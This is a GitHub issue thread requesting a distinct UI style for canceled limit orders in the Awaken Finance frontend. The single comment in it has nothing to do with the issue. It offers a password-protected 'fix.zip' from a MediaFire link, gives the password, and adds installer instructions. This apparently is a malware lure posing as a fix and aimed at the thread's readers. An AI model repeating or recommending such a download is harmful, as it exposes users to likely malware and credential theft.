### ISSUE TITLE
Improve Status Rendering of Canceled Limit Orders

### ISSUE THREAD

**Issue by harold-awaken** [Awaken-Finance/awaken-frontend#160]
### Expected Behavior
After a limit order is canceled, the corresponding list item should have a clear and distinct status rendering to reflect the cancellation.

### Specifications
As a `user`, I would like to see the status of canceled limit orders clearly so that I can easily distinguish them from active or filled orders.

**Features:**
- The list item for a canceled limit order should have a unique style or indicator to show it has been canceled.

**Development Tasks:**
- [x]  Add necessary logic to handle the state of the canceled orders in the UI.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
